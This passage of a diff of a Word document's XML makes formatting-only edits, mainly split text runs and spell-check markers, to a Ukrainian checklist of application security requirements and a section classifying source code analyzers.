+              <w:t xml:space="preserve">пароля включає в себе старий пароль, новий пароль і </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>п</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ідтвердження пароля.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10566,7 +11977,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> в себе запити з відповідними метаданими, необхідними для досліджень безпеки.</w:t>
+              <w:t xml:space="preserve"> в себе запити з відповідними метаданими, необхідними для </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>досл</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>іджень безпеки.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10763,7 +12196,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>Переконайтеся, немає паролів за замовчуванням у використанні для середовища розробки програми або будь-які компоне</w:t>
+              <w:t xml:space="preserve">Переконайтеся, немає паролів за замовчуванням у використанні для середовища розробки програми або </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>будь-як</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>і компоне</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11683,7 +13138,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>Переконайтеся в тому, що система може бути налаштована, щоб заборонити використання заданого кількості попередніх паролів.</w:t>
+              <w:t xml:space="preserve">Переконайтеся </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>в</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> тому, що система може бути налаштована, щоб заборонити використання заданого кількості попередніх паролів.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11880,7 +13357,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся в тому, що вживаються заходи, щоб заблокувати використання </w:t>
+              <w:t xml:space="preserve">Переконайтеся </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>в</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> тому, що вживаються заходи, щоб заблокувати використання </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13752,7 +15251,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>Переконайтеся в тому, що немає користувальницьких менеджер сеансів, або що диспетчер сеансу стійкий проти всіх атак управління загального сеансу.</w:t>
+              <w:t xml:space="preserve">Переконайтеся в тому, що немає користувальницьких менеджер сеансів, або що диспетчер сеансу </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ст</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ійкий проти всіх атак управління загального сеансу.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -13935,7 +15456,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>Переконайтеся в тому, що сеанси анулюються, коли користувач виходить з системи.</w:t>
+              <w:t xml:space="preserve">Переконайтеся </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>в</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> тому, що сеанси анулюються, коли користувач виходить з системи.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14152,7 +15695,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> після певного періоду бездіяльності.</w:t>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>п</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ісля певного періоду бездіяльності.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14369,7 +15934,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> після того, як</w:t>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>п</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ісля того, як</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -14864,7 +16451,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">, повідомлень про помилки або журналах. Це включає в себе перевірку того, що програма не вміє обробляти </w:t>
+              <w:t xml:space="preserve">, повідомлень про помилки або журналах. Це </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>включає в</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> себе перевірку того, що програма не вміє обробляти </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -15270,6 +16879,7 @@
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -15350,6 +16960,7 @@
               </w:rPr>
               <w:t>додатком.</w:t>
             </w:r>
+            <w:proofErr w:type="gramEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -16130,7 +17741,51 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся в тому, що </w:t>
+              <w:t xml:space="preserve">Переконайтеся </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>в</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>тому</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, що </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -16437,7 +18092,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> до відхилення запиту та</w:t>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>до</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> відхилення запиту та</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -16654,7 +18331,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся, що вхідні перевірка підпрограми </w:t>
+              <w:t xml:space="preserve">Переконайтеся, що вхідні перевірка </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>п</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">ідпрограми </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -16875,7 +18574,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>Переконайтеся, що єдиний орган управління перевірки вхідних даних використовується додатком для кожного типу да</w:t>
+              <w:t xml:space="preserve">Переконайтеся, що єдиний орган управління перевірки вхідних даних використовується додатком для </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>кожного</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> типу да</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -17385,7 +19106,51 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся в тому, що програма не сприйнятливий до </w:t>
+              <w:t xml:space="preserve">Переконайтеся </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>в</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>тому</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, що програма не сприйнятливий до </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -18595,6 +20360,7 @@
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -18665,6 +20431,7 @@
               </w:rPr>
               <w:t xml:space="preserve"> на стороні сервера.</w:t>
             </w:r>
+            <w:proofErr w:type="gramEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -18852,6 +20619,7 @@
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -18922,6 +20690,7 @@
               </w:rPr>
               <w:t xml:space="preserve"> певною схемою, включаючи допустимі символи, довжини і структури (наприклад, номери кредитних карт або по телефону</w:t>
             </w:r>
+            <w:proofErr w:type="gramEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -20473,7 +22242,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>140-2 або еквівалентного стандарту.</w:t>
+              <w:t>140-2 або екві</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>валентного</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> стандарту.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -20957,7 +22748,51 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>Переконайтеся в тому, що життєвий цикл</w:t>
+              <w:t xml:space="preserve">Переконайтеся </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>в</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>тому</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>, що життєвий цикл</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -21775,7 +23610,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -21796,6 +23630,33 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Класифікація аналізаторів вихідного коду</w:t>
       </w:r>
     </w:p>
@@ -22045,7 +23906,29 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">Перша група включає в себе аналізатори коду веб-додатків і засоби щодо запобігання експлуатації вразливостей веб-сайтів. </w:t>
+        <w:t xml:space="preserve">Перша група </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>включає в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> себе аналізатори коду веб-додатків і засоби щодо запобігання експлуатації вразливостей веб-сайтів. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -22079,7 +23962,29 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">Друга група - аналізатори вбудованого коду, що дозволяють виявити проблемні місця в початкових текстах модулів, призначених для розширення функціональності корпоративних і виробничих систем. До таких модулів відносяться програми для лінійки продуктів 1С, розширення CRM-систем, систем управління підприємством і систем SAP. </w:t>
+        <w:t xml:space="preserve">Друга група - аналізатори вбудованого коду, що дозволяють виявити проблемні місця в початкових текстах модулів, призначених для розширення функціональності корпоративних і виробничих систем. До таких модулів </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ідносяться програми для лінійки продуктів 1С, розширення CRM-систем, систем управління підприємством і систем SAP. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -22113,8 +24018,9 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">Остання група призначена для аналізу вихідного коду на різних мовах програмування, що не відносяться до бізнес-додатків і веб-додатків. Такі аналізатори призначені для замовників і розробників програмного забезпечення. У тому числі дана група аналізаторів застосовується для використання методології захищеної розробки програмних продуктів. Аналізатори статичного коду знаходять проблеми і потенційно вразливі місця в початкових кодах і видають рекомендації для їх усунення. Варто </w:t>
-      </w:r>
+        <w:t xml:space="preserve">Остання група призначена для аналізу вихідного коду на </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
